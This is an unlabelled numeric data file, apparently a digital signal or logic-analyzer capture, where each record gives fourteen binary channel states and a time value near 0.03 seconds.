1,1,0,0,1,1,0,0,0,1,0,0,0,0,2.9947556e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,2.9947580e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,2.9947604e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9947612e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9947652e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9947676e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9947704e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9947728e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9947756e-02 1,1,0,0,1,0,0,0,0,1,0,0,0,0,2.9947780e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,2.9947784e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,2.9947828e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,2.9947852e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9947860e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9947876e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9947904e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9947928e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9947956e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9947980e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9948004e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9948052e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9948076e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9948104e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9948128e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9948156e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9948180e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9948204e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9948228e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9948252e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9948276e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9948304e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9948328e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9948356e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9948380e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9948404e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9948428e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9948452e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9948476e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9948528e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9948556e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9948580e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9948604e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9948628e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9948652e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,2.9948660e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,2.9948676e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,2.9948704e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,2.9948728e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,2.9948756e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9948760e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9948804e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9948828e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9948852e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9948876e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,2.9948884e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,2.9948928e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,2.9948956e-02 1,1,0,0,1,1,0,0,0,0,0,0,0,0,2.9948960e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9948964e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9948980e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9949004e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9949028e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9949052e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9949076e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9949100e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9949124e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9949148e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,2.9949156e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,2.9949204e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,2.9949228e-02 1,1,0,0,1,1,0,0,0,0,0,0,0,0,2.9949232e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9949236e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9949252e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9949276e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9949300e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9949324e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9949348e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9949376e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9949400e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9949428e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9949452e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9949476e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9949500e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9949524e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9949548e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9949576e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9949600e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9949628e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9949652e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9949676e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9949700e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9949724e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9949748e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9949776e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9949800e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9949828e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9949852e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9949876e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9949904e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9949928e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9949956e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9949980e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9950004e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9950028e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9950052e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9950076e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9950104e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9950128e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9950156e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9950180e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9950204e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9950228e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9950252e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9950276e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9950304e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9950328e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9950356e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9950380e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9950404e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9950428e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9950452e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9950476e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9950504e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9950528e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9950556e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9950580e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9950604e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9950628e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9950660e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9950684e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9950708e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9950736e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9950760e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,2.9950788e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,1,3.0075204e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,1,3.0075380e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,1,3.0075384e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,1,3.0075404e-02 0,0,1,0,1,1,0,0,0,1,0,1,0,1,3.0075424e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,1,3.0075452e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,1,3.0075772e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,1,3.0075796e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,1,3.0075804e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,1,3.0075844e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,1,3.0075868e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,1,3.0075924e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,1,3.0075944e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,1,3.0075996e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,1,3.0076020e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0076036e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0076068e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0076092e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0076144e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0076168e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0076196e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0076220e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0076244e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0076268e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0076324e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0076344e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0076396e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0076420e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.0076424e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,3.0076468e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.0076492e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0076500e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0076544e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0076568e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0076620e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0076644e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0076668e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0076696e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.0076700e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,3.0076720e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.0076748e-02 0,0,1,0,1,1,0,0,0,0,0,0,0,0,3.0076752e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0076756e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0076796e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0076820e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0076872e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0076896e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0076948e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0076972e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0077020e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0077044e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.0077052e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,3.0077072e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.0077096e-02 0,0,1,0,1,1,0,0,0,0,0,0,0,0,3.0077100e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0077104e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0077120e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.0077148e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,3.0077196e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.0077220e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0077228e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0077244e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0077272e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0077296e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0077320e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0077348e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0077372e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0077396e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0077420e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.0077428e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,3.0077472e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.0077496e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0077504e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0077524e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0077548e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0077572e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0077596e-02 0,0,1,0,1,0,0,0,0,1,0,0,0,0,3.0077600e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.0077604e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,3.0077620e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.0077644e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0077652e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0077696e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0077724e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0077768e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0077796e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0077844e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0077868e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.0077876e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,3.0077896e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.0077920e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0077928e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0077944e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0077968e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.0077972e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,3.0077996e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.0078020e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0078028e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0078068e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0078092e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0078144e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0078168e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0078220e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0078244e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0078292e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.0078324e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,3.0078344e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.0078368e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0078376e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0078396e-02 0,0,1,0,1,0,0,0,0,1,0,0,0,0,3.0078420e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.0078424e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,3.0078468e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.0078492e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0078500e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0078524e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0078544e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0078568e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0078596e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0078620e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0078644e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0078668e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0078692e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.0078700e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,3.0078744e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.0078768e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0078776e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0078796e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0078820e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0078844e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0078868e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0078892e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0078924e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0078944e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0078968e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0078996e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0079020e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0079044e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0079068e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0079092e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0079120e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0079144e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0079168e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0079196e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0079220e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0079268e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0079292e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0079344e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0079368e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.0079372e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,3.0079420e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.0079444e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0079452e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0079492e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0079524e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0079572e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0079596e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0079620e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0079644e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.0079652e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,3.0079668e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.0079692e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0079700e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0079744e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0079768e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0079820e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0079844e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0079892e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0079924e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0079972e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.0079996e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,3.0080020e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.0080044e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0080052e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0080068e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0080092e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0080120e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0080144e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.0080148e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,3.0080168e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.0080196e-02 0,0,1,0,1,1,0,0,0,0,0,0,0,0,3.0080200e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0080204e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0080244e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0080268e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0080324e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0080348e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0080396e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0080420e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.0080428e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,3.0080444e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.0080472e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0080476e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0080496e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0080524e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0080548e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0080572e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0080596e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0080620e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0080644e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0080672e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0080696e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0080724e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0080748e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0080772e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0080796e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0080820e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0080844e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0080872e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.0080876e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,3.0080896e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.0080920e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0080928e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0080972e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0080996e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0081044e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0081072e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0081124e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0081148e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0081196e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0081220e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.0081228e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,3.0081244e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.0081272e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0081276e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0081296e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.0081324e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,3.0081348e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.0081372e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0081380e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0081420e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0081444e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0081496e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0081524e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0081572e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0081596e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0081644e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0081672e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.0081676e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,3.0081696e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.0081724e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0081728e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0081748e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0081772e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0081796e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0081820e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0081844e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0081868e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0081896e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0081924e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0081948e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0081972e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0081996e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0082020e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0082044e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0082072e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0082096e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0082120e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0082148e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0082172e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0082196e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0082220e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0082244e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0082268e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0082296e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0082320e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0082348e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0082372e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0082396e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0082420e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0082444e-02 